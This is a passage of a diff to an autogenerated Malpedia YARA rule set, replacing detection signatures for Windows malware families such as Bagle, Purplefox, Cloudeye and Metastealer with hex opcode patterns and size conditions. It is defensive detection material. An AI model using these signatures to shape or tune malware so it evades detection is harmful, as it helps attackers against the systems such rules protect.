} condition: - 7 of them and filesize <133120 + 7 of them and filesize <475136 } -rule MALPEDIA_Win_Rustock_Auto : FILE +rule MALPEDIA_Win_Bagle_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "cb44bdc8-a730-56ac-98ad-0553c4475f0d" + id = "df34f7e5-e23a-57ca-9057-158d47df6a58" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.rustock" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.rustock_auto.yar#L1-L123" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bagle" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.bagle_auto.yar#L1-L121" license_url = "N/A" - logic_hash = "5fff7e7d2c26e2013c1d3a65535e3ac75dc9cd45cc7a0c04309e438d2a86951e" + logic_hash = "191b784ad61e65e2f10fbf592eeed47046bf8d9317c3471370d1a12460ef9a14" score = 75 quality = 75 tags = "FILE" @@ -136770,34 +139535,34 @@ rule MALPEDIA_Win_Rustock_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8d6424fc 892c24 31ed 01e5 8d6424e4 50 } - $sequence_1 = { 031d???????? 21db 5e 5a } - $sequence_2 = { 8bd8 85db 7439 8b4dc0 33c0 8bfb 8bd1 } - $sequence_3 = { 83c604 56 53 ff15???????? 53 } - $sequence_4 = { 833d????????00 7421 56 e8???????? 85c0 59 75ac } - $sequence_5 = { 50 ff7520 e8???????? 83c418 8945cc 3bc7 74d4 } - $sequence_6 = { ff750c e8???????? 68e8030000 ff15???????? e8???????? 8bf8 } - $sequence_7 = { 59 8945c4 83f8ff 7507 33c0 e9???????? 3b4520 } - $sequence_8 = { ebb5 7402 ebd3 8b1c24 68???????? } - $sequence_9 = { 014514 a1???????? 83f802 0f84de010000 3bc7 } + $sequence_0 = { b03d f3aa 5b 5f 5e c9 } + $sequence_1 = { c745f400000000 6a06 6a01 6a02 e8???????? 8bd8 ff7508 } + $sequence_2 = { e340 ac c1e010 83f901 740b } + $sequence_3 = { c9 c20c00 c1c206 8bc2 } + $sequence_4 = { f7d9 2bf9 b03d f3aa 5b 5f 5e } + $sequence_5 = { 68???????? e8???????? 0bc0 7426 6880000000 68???????? e8???????? } + $sequence_6 = { c20c00 c1c206 8bc2 243f 3c3e } + $sequence_7 = { 53 8b7508 8b7d0c 8b4d10 } + $sequence_8 = { 59 43 83fb12 7508 33db } + $sequence_9 = { e8???????? 58 c9 c20400 55 8bec 83c4f8 } condition: - 7 of them and filesize <565248 + 7 of them and filesize <245760 } -rule MALPEDIA_Win_Rumish_Auto : FILE +rule MALPEDIA_Win_Purplefox_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "c7d955e8-6589-5477-8769-7cb86586e6f1" + id = "864146ba-a135-5d92-a900-c7434a0b6e81" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.rumish" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.rumish_auto.yar#L1-L133" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.purplefox" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.purplefox_auto.yar#L1-L376" license_url = "N/A" - logic_hash = "eaf86e8ce2c9b9b903be9f070aac683527bbc8f25626d1b33901e14e32dd278c" + logic_hash = "2241b5e41c5930d16a914d761ccbb07709436fc80bf5297a0da02f1f8d89a59e" score = 75 - quality = 75 + quality = 73 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" @@ -136809,32 +139574,62 @@ rule MALPEDIA_Win_Rumish_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8d450c 50 e8???????? 8b4df8 e8???????? 8b45f8 8be5 } - $sequence_1 = { eb46 68???????? 8d8d78feffff e8???????? eb34 68???????? 8d8d78feffff } - $sequence_2 = { 7375 8b9570ffffff 0faf5580 039574ffffff 899574feffff 8d8574feffff 50 } - $sequence_3 = { 898534ffffff 8b8d34ffffff 3b4d94 7d40 e8???????? 8985a8feffff } - $sequence_4 = { 8d8df0faffff e8???????? e9???????? 68???????? 8d8df0faffff e8???????? e9???????? } - $sequence_5 = { 0fbf4dbc 898d30ffffff 8b9530ffffff 83ea04 899530ffffff 83bd30ffffff0b 0f87a4020000 } - $sequence_6 = { 7d5d e8???????? 898560ffffff db8560ffffff dc0d???????? dc35???????? d9bd5effffff } - $sequence_7 = { e8???????? 6a01 8b55f0 52 8b4d9c 83c10c e8???????? } - $sequence_8 = { 8bec 83ec08 894df8 51 8bcc 8965fc 8d450c } - $sequence_9 = { 83e901 898d80feffff 8d9580feffff 52 8d4d84 e8???????? 8b4580 } + $sequence_0 = { 8945ec 8d45f0 50 8d4dd8 8d55f8 51 } + $sequence_1 = { d2de feca 28c3 80d262 9c } + $sequence_2 = { 66f7d9 c1e810 52 66c1d908 0f9fc5 } + $sequence_3 = { 8918 e8???????? 4c8d15a7c70000 4885c0 7404 4c8d5010 8bcb } + $sequence_4 = { 8d45f8 50 6a00 6a00 c745f800000000 } + $sequence_5 = { 488b8d08040000 488d442470 4d8b00 4533c9 ba00000100 4889742428 48899c24f0040000 } + $sequence_6 = { ff15???????? 488bc8 ff15???????? 488d1528460000 488bce } + $sequence_7 = { 8b04c52cbb4000 5d c3 8bff 55 8bec } + $sequence_8 = { ffd6 83c410 8d542424 52 8d442410 e8???????? } + $sequence_9 = { 0f1005???????? f20f100d???????? 4889bc24c8000000 33ff } + $sequence_10 = { 51 0f9dc3 8b742404 685af85bca 8b7c240c } + $sequence_11 = { 56 57 68???????? e8???????? 83c404 6a00 6a00 } + $sequence_12 = { cf b94523340a e8???????? 06 } + $sequence_13 = { b614 dc1a 7038 1f a5 } + $sequence_14 = { 415d 415c 5f c3 4889742478 488bb42490000000 } + $sequence_15 = { 8d4df4 51 52 56 6a00 50 } + $sequence_16 = { 488b4238 48894108 488b4a50 4885c9 } + $sequence_17 = { e8???????? 8dbddcfdffff e8???????? 8dbddcfdffff c745fcffffffff } + $sequence_18 = { 6685c9 75f1 8d85f8fdffff 56 33f6 8d5002 } + $sequence_19 = { 8944241c 52 8d44241c 50 } + $sequence_20 = { 4803d8 41b800040000 48899d00040000 e8???????? e9???????? 488b4c2470 ff15???????? } + $sequence_21 = { 448bcf 4889442420 e8???????? 8bc7 488d4dd0 33d2 } + $sequence_22 = { 8b703c 66f7da 0fbae603 0fca 20c6 01c6 42 } + $sequence_23 = { 4883c308 483bdf 72ed 48833d????????00 741f 488d0d36c60000 e8???????? } + $sequence_24 = { 57 68???????? 68???????? bf00500000 ff15???????? 50 ff15???????? } + $sequence_25 = { ff15???????? 488d542450 488d0d96b10000 e8???????? } + $sequence_26 = { 3bf3 7d1e 8b4de8 ff15???????? 8b4df8 51 } + $sequence_27 = { 52 ffd3 85c0 7507 b802000000 eb1a } + $sequence_28 = { 9c 368810 c6042413 60 } + $sequence_29 = { 668b460c 8b5508 6a01 668945e4 } + $sequence_30 = { 4533c0 33d2 4489b424a0000000 4889442420 } + $sequence_31 = { a1???????? a3???????? a1???????? c705????????bb454000 8935???????? } + $sequence_32 = { e8???????? 83c408 33ff eb23 68???????? } + $sequence_33 = { 4885c0 743f 488b0d???????? 488d1551970000 } + $sequence_34 = { 8b1d???????? 68???????? 50 ffd3 85c0 750c 8b4f08 } + $sequence_35 = { c744246800010000 488bf9 4889742460 89742458 89742450 4889742448 } + $sequence_36 = { 488d0de4d20000 483bd9 723e 488d0568d60000 483bd8 7732 488bd3 } + $sequence_37 = { 48ffce 75a3 8b4504 03c5 8be8 833800 } + $sequence_38 = { 897c2404 e8???????? e8???????? 8d64242c 0f850a000000 660fb6d8 } + $sequence_39 = { 56 57 4883ec50 8bc9 488d942480000000 ff15???????? } condition: - 7 of them and filesize <770048 + 7 of them and filesize <1983488 } -rule MALPEDIA_Win_Amadey_Auto : FILE +rule MALPEDIA_Win_Ranbyus_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "bcbf3802-d510-5a36-b69a-5e392988dabd" + id = "9b877552-6bf5-5d12-bef1-733cc6b8feac" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.amadey_auto.yar#L1-L208" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ranbyus" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.ranbyus_auto.yar#L1-L117" license_url = "N/A" - logic_hash = "c915860f91ad45f2eb5b15d5deb4fc25f32146851585f24cbb18a6984390dbf0" + logic_hash = "c376990edfad6c071124a105ec8d7e8afaf3007f10ae4746a7ce39d3890ccde0" score = 75 quality = 75 tags = "FILE" @@ -136848,81 +139643,71 @@ rule MALPEDIA_Win_Amadey_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { ebb0 b8???????? 83c410 5b } - $sequence_1 = { e8???????? 89c2 8b45f4 89d1 ba00000000 f7f1 } - $sequence_2 = { c744240805000000 c744240402000000 890424 e8???????? } - $sequence_3 = { c9 c3 55 89e5 81ecc8010000 } - $sequence_4 = { c70424???????? e8???????? 8b45fc 89442408 c7442404???????? 8b4508 890424 } - $sequence_5 = { c744240800020000 8d85f8fdffff 89442404 891424 e8???????? 83ec20 } - $sequence_6 = { c70424???????? e8???????? 890424 e8???????? 84c0 7407 c745fc05000000 } - $sequence_7 = { 83ec04 8945f4 837df400 7454 8b4508 890424 } - $sequence_8 = { 83fa10 722f 8b8d78feffff 42 } - $sequence_9 = { 8b8d78feffff 42 8bc1 81fa00100000 7214 8b49fc } - $sequence_10 = { 68???????? e8???????? 8d4dcc e8???????? 83c418 } - $sequence_11 = { 68???????? e8???????? 8d4db4 e8???????? 83c418 } - $sequence_12 = { 52 6a02 6a00 51 ff75f8 ff15???????? ff75f8 } - $sequence_13 = { 8bce e8???????? e8???????? 83c418 e8???????? e9???????? 52 } - $sequence_14 = { c705????????0c000000 eb31 c705????????0d000000 eb25 83f901 750c } - $sequence_15 = { 50 68???????? 83ec18 8bcc 68???????? e8???????? } - $sequence_16 = { 8bcc 68???????? e8???????? 8d8d78feffff e8???????? 83c418 } - $sequence_17 = { c78584fdffff0f000000 c68570fdffff00 83fa10 722f 8b8d58fdffff 42 } - $sequence_18 = { c78520fdffff00000000 c78524fdffff0f000000 c68510fdffff00 83fa10 722f } - $sequence_19 = { 51 e8???????? 83c408 8b950cfdffff c78520fdffff00000000 c78524fdffff0f000000 } + $sequence_0 = { 7504 83c8ff c3 c7402401000000 } + $sequence_1 = { 894608 8b44241c 56 68???????? 89460c } + $sequence_2 = { 83c414 85f6 7414 6a01 6a01 57 } + $sequence_3 = { 760a 814e2500500000 c6060f 0fb606 5e 5b } + $sequence_4 = { a1???????? eb09 83780400 7507 8b4034 85c0 } + $sequence_5 = { e8???????? 59 8b4e05 89410b 8b4605 39780b 7407 } + $sequence_6 = { 8b4e05 89410b 8b4605 39780b } + $sequence_7 = { 83c621 8a06 3c46 7240 3c47 } + $sequence_8 = { 83780400 7507 8b4034 85c0 75f3 c3 } + $sequence_9 = { c3 837c240800 7467 8b44240c } condition: - 7 of them and filesize <529408 + 7 of them and filesize <638976 } -rule MALPEDIA_Win_Polyglotduke_Auto : FILE +rule MALPEDIA_Win_Cloudeye_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "afe4cb05-aa94-5225-84e8-b6489c3e26d1" + id = "55cebb53-71a5-52d8-a3dc-f73efa113a86" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.polyglotduke" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.polyglotduke_auto.yar#L1-L124" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.cloudeye_auto.yar#L1-L120" license_url = "N/A" - logic_hash = "37a5b9867f5de08a35688f7a9273792487d4c60d613dec2d499a53b9323d3f00" + logic_hash = "ce7b005739a8ed2a89f930168aa824ea8a88d8cc7cac3881e5d28b500fe73c46" score = 75 quality = 75 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" signator_config = "callsandjumps;datarefs;binvalue" - malpedia_rule_date = "20231130" - malpedia_hash = "fc8a0e9f343f6d6ded9e7df1a64dac0cc68d7351" - malpedia_version = "20230808" - malpedia_license = "CC BY-SA 4.0" - malpedia_sharing = "TLP:WHITE" - - strings: - $sequence_0 = { e8???????? 488b5608 448bc7 488bc8 488bd8 e8???????? } - $sequence_1 = { 0fb7f9 492bf3 498bcb 33d2 33c0 } - $sequence_2 = { 48895c2408 57 4883ec20 488bfa 488bd9 488d0595970000 488981a0000000 } - $sequence_3 = { 4c8be8 e8???????? 488d0d88120100 e8???????? 488d4c2430 8bd3 4c8bc0 } - $sequence_4 = { 488be8 498bcc e8???????? 488bcf e8???????? } - $sequence_5 = { 48894518 e8???????? 488d0dbae30000 48894520 e8???????? 488d0daee30000 } - $sequence_6 = { 42392c3e 0f849bfaffff 428b143e 4a8d4c3e04 e8???????? 488d0dec0c0100 ba10000000 } - $sequence_7 = { e8???????? b8cdcccccc f7e5 c1ea02 8d0492 2be8 } - $sequence_8 = { 99 f77c2428 4863c2 410fb70c46 488b442440 4533f6 66894c4450 } - $sequence_9 = { 488bf1 8d4301 ba02000000 498be8 } + malpedia_rule_date = "20231130" + malpedia_hash = "fc8a0e9f343f6d6ded9e7df1a64dac0cc68d7351" + malpedia_version = "20230808" + malpedia_license = "CC BY-SA 4.0" + malpedia_sharing = "TLP:WHITE" + + strings: + $sequence_0 = { 83c002 668b1c08 668b140e 6639d3 75e4 83e902 83f900 } + $sequence_1 = { 7545 66f7c14179 685595db6d e8???????? } + $sequence_2 = { e8???????? 5f 59 83c628 41 3b8f04080000 75a8 } + $sequence_3 = { 7408 0185f4000000 eba4 85d8 } + $sequence_4 = { 89f8 0500080000 50 6aff } + $sequence_5 = { 6685d2 e8???????? 84ef 80fd37 57 e8???????? 58 } + $sequence_6 = { c3 38ed 817e24200000e0 7473 } + $sequence_7 = { 668b00 6631c8 39c8 6631c3 6681fb4d5a 7407 6639c1 } + $sequence_8 = { 0fbae11f 0f82d63c0000 61 0faee8 0f31 0faee8 c1e220 } + $sequence_9 = { 75e4 83e902 83f900 7deb ff742404 } condition: - 7 of them and filesize <222784 + 7 of them and filesize <90112 } -rule MALPEDIA_Win_Buzus_Auto : FILE +rule MALPEDIA_Win_Buterat_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "abeb46d7-6b5d-534d-9d29-46b219047b43" + id = "3e97b50a-971b-5a6b-945e-3e34fedb231a" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.buzus" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.buzus_auto.yar#L1-L130" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.buterat" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.buterat_auto.yar#L1-L129" license_url = "N/A" - logic_hash = "4ce965d715abb7623aae188d8dd7527d9c7207cb501cc27ac457187efef652e0" + logic_hash = "eb64ab06f54c3ecee14053c6efd01e298ad3b6ab4366443760576f0899003a4d" score = 75 quality = 75 tags = "FILE" @@ -136936,34 +139721,34 @@ rule MALPEDIA_Win_Buzus_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 5d 7413 68???????? 50 ffd6 3bc3 a3???????? } - $sequence_1 = { 4e 46 897508 ebbd 803e2a 750b 83f801 } - $sequence_2 = { ff75c0 ff75bc 50 e8???????? 83c40c 83f801 0f85e4000000 } - $sequence_3 = { e8???????? 8d8554fdffff 50 8d85ccfdffff 50 68???????? } - $sequence_4 = { 68???????? 6a01 56 68???????? 33ff 8975f0 8975f4 } - $sequence_5 = { 50 ff15???????? be???????? 8d84242c280000 } - $sequence_6 = { 898524ffffff 8b45bc 89850cffffff 8b45d8 898514ffffff 6bc03c 6a31 } - $sequence_7 = { 385802 750e 0fbe5001 c68415b0feffff01 eb28 80fa2d 7539 } - $sequence_8 = { 6a03 58 8945b8 6a3c 59 3bc1 7603 } - $sequence_9 = { 68???????? 50 ff7508 e8???????? 83c41c 8b45d4 68b80b0000 } + $sequence_0 = { 56 8d4dfc 51 57 50 53 } + $sequence_1 = { 750a 56 6a07 e8???????? 59 59 ff750c } + $sequence_2 = { ff15???????? 8b5d75 53 33c0 e8???????? 85c0 59 } + $sequence_3 = { 56 57 33f6 e8???????? 85c0 59 0f868b000000 } + $sequence_4 = { 750b e8???????? 99 f77dfc 8bda 837d6806 } + $sequence_5 = { 8d8564dfffff 50 8bc3 e8???????? 83c40c ff75f4 ffd7 } + $sequence_6 = { 8bec b800100000 e8???????? 8b4d08 } + $sequence_7 = { e8???????? 83c40c 85c0 0f8424010000 68???????? 53 68???????? } + $sequence_8 = { 41 41 47 3b7d0c 72cd 5b 33c0 } + $sequence_9 = { 33db 385d1c 56 57 895df0 750d 8a4518 } condition: - 7 of them and filesize <679936 + 7 of them and filesize <278528 } -rule MALPEDIA_Win_Etumbot_Auto : FILE +rule MALPEDIA_Win_Naikon_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "73e6da41-e3d5-504c-8c80-6f8ec05bab3e" + id = "2b0fa492-57d4-5b88-95d9-a0b325c3a81c" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.etumbot" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.etumbot_auto.yar#L1-L332" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.naikon" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.naikon_auto.yar#L1-L125" license_url = "N/A" - logic_hash = "564ae417565d87b67b974a9ba2ad8948ae9936f9dac5ee557fc27d8a92da27f9" + logic_hash = "10ad96daf91bea73d71b90a544491c018eb03e29efd792a88809f482c814e2f1" score = 75 - quality = 73 + quality = 75 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" @@ -136975,59 +139760,32 @@ rule MALPEDIA_Win_Etumbot_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8811 8a00 02c2 0fb6c0 8a8405fcfeffff 320437 8806 } - $sequence_1 = { 8bec 53 56 57 8b3d???????? ffd7 } - $sequence_2 = { 7407 8bf9 c1ef18 33c7 f7d1 23c1 } - $sequence_3 = { c745ac5c5c4d69 c745b063726f73 c745b46f66745c c745b85c57696e } - $sequence_4 = { c1e004 03c1 8bc8 81e1000000f0 7407 8bf9 } - $sequence_5 = { 8d45f4 6820a10700 50 68???????? 68???????? } - $sequence_6 = { c745c05c5c4375 c745c47272656e c745c874566572 c745cc73696f6e c745d05c5c496e } - $sequence_7 = { 42 4e 75df 5f } - $sequence_8 = { ffd7 8b7508 8bd8 69f660ea0000 } - $sequence_9 = { c745b46f66745c c745b85c57696e c745bc646f7773 c745c05c5c4375 } - $sequence_10 = { 57 0fbe38 33f6 33db } - $sequence_11 = { c745d47465726e c745d865742053 c745dc65747469 c745e06e677300 } - $sequence_12 = { f7d1 23c1 42 4e } - $sequence_13 = { ffd7 2bc3 3bc6 72ed } - $sequence_14 = { c645bf69 c645c062 c645c16c c645c265 } - $sequence_15 = { 80e10f c0e102 c0eb06 02cb } - $sequence_16 = { c645c16c c645c265 c645c33b c645c420 } - $sequence_17 = { 56 8bf1 8b08 83f903 } - $sequence_18 = { c645c54d c645c653 c645c749 c645c845 c645c920 } - $sequence_19 = { 84c9 74b6 5f 5e 8bc2 } - $sequence_20 = { 33c0 56 89442418 57 89442420 } - $sequence_21 = { 0345f0 8b4d08 034dec 8a11 8810 8b45f0 83c001 } - $sequence_22 = { 750d 83c01c 8bce 50 e8???????? } - $sequence_23 = { 8d4a01 83c404 8bd1 c1e902 f3ab 8bca 83e103 } - $sequence_24 = { 83c204 3b5514 7608 83c8ff } - $sequence_25 = { 83c104 3b4d14 7608 83c8ff } - $sequence_26 = { 53 57 e8???????? 8d86b0000000 50 } - $sequence_27 = { 034df0 8b5508 0355ec 8a02 } - $sequence_28 = { 52 e8???????? 83c404 e9???????? 6a05 } - $sequence_29 = { c645d057 c645d169 c645d26e c645d364 } - $sequence_30 = { 6a00 68???????? 6a00 6a00 6a00 51 68???????? } - $sequence_31 = { 83fa01 7538 8b4514 8b19 0fb60438 c1e802 } - $sequence_32 = { 46 eb0f 0fb6d2 f68201ce400004 7403 40 ff01 } - $sequence_33 = { 8b4d08 83c101 894d08 8b550c 83ea03 } - $sequence_34 = { 50 57 8bce e8???????? 8d45f0 8d7e70 } - $sequence_35 = { c68543fffffff7 c68544ffffff52 c68545ffffff91 c68546ffffff1c c68547fffffff7 c68548ffffff64 c68549ffffffa3 } - $sequence_36 = { c685ddfdffffa4 c685defdffffb3 c685dffdffff02 c685e0fdffff30 c685e1fdffffd6 c685e2fdfffffb } + $sequence_0 = { 881c08 8d4405c9 50 e8???????? 59 8b4d0c 8901 } + $sequence_1 = { 8d85f8feffff 68???????? 50 e8???????? 8b3d???????? 83c418 8d85a8fcffff } + $sequence_2 = { ff750c c745f002000000 897dec c745e401000000 57 897de0 ff7508 } + $sequence_3 = { 53 50 8d85f4fffdff 56 50 ff35???????? } + $sequence_4 = { 83c418 57 50 8d8528ffffff 50 ffb690000000 e8???????? } + $sequence_5 = { 6a10 57 681cc10000 897df4 ff750c c745f002000000 } + $sequence_6 = { 53 53 8b4010 8d4d0c } + $sequence_7 = { e8???????? 83c40c 837df400 7408 ff75f4 e8???????? } + $sequence_8 = { 83c41c 33c0 808405dcf9fffffb 40 } + $sequence_9 = { 6a01 ff35???????? ff15???????? 8bd8 8b4508 46 6a00 } condition: - 7 of them and filesize <450560 + 7 of them and filesize <188416 } -rule MALPEDIA_Win_Quarterrig_Auto : FILE +rule MALPEDIA_Win_Metastealer_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "b690a4f4-b484-55ac-b058-10bc50927e69" + id = "cdc28210-4a73-5ebc-92c2-e9cca60e6ba0" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.quarterrig" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.quarterrig_auto.yar#L1-L130" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.metastealer" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.metastealer_auto.yar#L1-L134" license_url = "N/A" - logic_hash = "311b3b8ecf53c484bcc2dd986bb0e82467b08ff5a42c5d9fde578d475409e28c" + logic_hash = "6d21821c6e275cca2327e10c362ceb42915cf515b000f17d28567b39e609820e" score = 75 quality = 75 tags = "FILE" @@ -137041,32 +139799,32 @@ rule MALPEDIA_Win_Quarterrig_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 32c0 e9???????? 8b15???????? 498bce ff15???????? 3d02010000 } - $sequence_1 = { 884597 33ff 897d9b 41f7411800400000 7528 410f1000 f30f7f45a7 } - $sequence_2 = { 4883c438 c3 488d0d53c10500 e8???????? 833d????????ff 75d2 c605????????01 } - $sequence_3 = { 65488b042558000000 ba04000000 488b0cc8 8b040a 3905???????? 7f19 488d0513cc0500 } - $sequence_4 = { 488b5590 4883fa10 720d 48ffc2 488b4c2478 e8???????? 4c896d88 } - $sequence_5 = { 488d0569fe0500 488b4c2448 4833cc e8???????? 0f28742460 0f287c2450 } - $sequence_6 = { eb3a e8???????? 4c8bc0 80780500 7429 33d2 } - $sequence_7 = { 4c89b690000000 4c89b698000000 0f108780000000 0f118680000000 0f108f90000000 0f118e90000000 4c89b790000000 } - $sequence_8 = { 4c8bcf 4533c0 488d5510 488d4c2478 e8???????? 83cb01 } - $sequence_9 = { 48895520 c744243402000000 41b840000000 458d78d0 418bd7 488d4d28 e8???????? } + $sequence_0 = { ff7710 50 e8???????? 8b4718 8d4b1c 894318 8d471c } + $sequence_1 = { 8b4220 894620 8d4228 894224 897a20 c70700000000 8bc6 } + $sequence_2 = { 8d4dd8 e8???????? c745fc00000000 8d45d8 68a3000000 68???????? 68???????? } + $sequence_3 = { 8b4104 894610 8b4104 8b400c 85c0 740c 89460c } + $sequence_4 = { eb0a c70600000000 c6460401 8a45ae 8b7d9c 8845af 660f1f440000 } + $sequence_5 = { eb0e 0f57c0 660f1345d4 8b7dd8 8b75d4 51 8d4dd4 } + $sequence_6 = { ff7314 68???????? 56 e8???????? 68???????? 56 e8???????? } + $sequence_7 = { ffd0 83c40c 85c0 7407 be01000000 eb02 33f6 } + $sequence_8 = { d945fc 5e 8be5 5d c3 8d8100000038 0bc6 } + $sequence_9 = { c7411000000000 c7411400000000 837e1408 8975d0 7205 8b16 8955d0 } condition: - 7 of them and filesize <971776 + 7 of them and filesize <26230784 } -rule MALPEDIA_Win_Cuba_Auto : FILE +rule MALPEDIA_Win_Grimagent_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "8e1fe25d-f2c0-551f-8e41-a3623d0fa4f8" + id = "228d515c-640e-56ca-8602-96023167bb1e" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cuba" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.cuba_auto.yar#L1-L166" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.grimagent" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.grimagent_auto.yar#L1-L120" license_url = "N/A" - logic_hash = "9f0de113045e5c6c763dd8b7a39764d54e03c53f19ccc2d0320fdbbeb66fa89e" + logic_hash = "96dca74317029a89173373ec308b352cf5e1c63ce0e2aa5c10efcec2082d0995" score = 75 quality = 75 tags = "FILE" @@ -137080,38 +139838,32 @@ rule MALPEDIA_Win_Cuba_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 0019 43 41 00444341 } - $sequence_1 = { ffb5fcfeffff ffb5fcfdffff ff15???????? 85c0 750d 8b95c0fbffff 53 } - $sequence_2 = { 33d2 85c0 7e0c 807c95bc19 740c 42 3bd0 } - $sequence_3 = { 85c0 0f84b4000000 8bbdc8fbffff 53 68???????? 8d85f0fbffff 50 } - $sequence_4 = { 000d???????? 384100 b538 41 } - $sequence_5 = { 0026 45 41 003a } - $sequence_6 = { 85c0 750c 57 ff15???????? e9???????? 56 ff15???????? } - $sequence_7 = { 0012 45 41 0026 } - $sequence_8 = { 6a02 6a00 688b010000 ff75f4 ff15???????? ff75f4 f7d8 } - $sequence_9 = { 757a ffb5d4fbffff 50 6800040000 } - $sequence_10 = { 8945f4 8b4514 40 c745ecac9c4000 894df8 8945fc } - $sequence_11 = { 0026 43 41 00b043410062 } - $sequence_12 = { 000c43 41 0035???????? 43 } - $sequence_13 = { 003a 45 41 004245 } - $sequence_14 = { 03f0 c1ca16 8b85e0feffff 03b40510ffffff 03b0f4b14100 03b5e8feffff 8d0437 } - $sequence_15 = { 000446 41 00d1 45 } + $sequence_0 = { 55 8bec 83ec18 c745f400000000 c745f800000000 c745e800000000 8b4508 } + $sequence_1 = { ebbe 8b550c 8955fc 8b450c 50 e8???????? } + $sequence_2 = { 0fb711 3bc2 7514 8b45ec 83c002 } + $sequence_3 = { 8b4dfc 0fb711 3bc2 7514 } + $sequence_4 = { 8b4508 50 e8???????? 83c404 3945f4 0f8394000000 8b4df0 } + $sequence_5 = { 0fb708 3bd1 7576 8b55f0 8955ec c745f800000000 eb09 } + $sequence_6 = { 83ec0c 8b450c 8945f8 c745fc00220400 8b4dfc } + $sequence_7 = { 8bec 8b4508 0fbe08 85c9 7426 8b5508 } + $sequence_8 = { c745e801000000 b801000000 eb1a 8b4df0 } + $sequence_9 = { 83c404 3945f8 750e c745e801000000 b801000000 } condition: - 7 of them and filesize <1094656 + 7 of them and filesize <582656 } -rule MALPEDIA_Win_Vapor_Rage_Auto : FILE +rule MALPEDIA_Win_Qadars_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "11bddf4b-6d86-5af5-ae51-c6d26a16eb1c" + id = "9fe67d17-52ae-502a-8e0c-394e495a69f5" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.vapor_rage" - source_url = 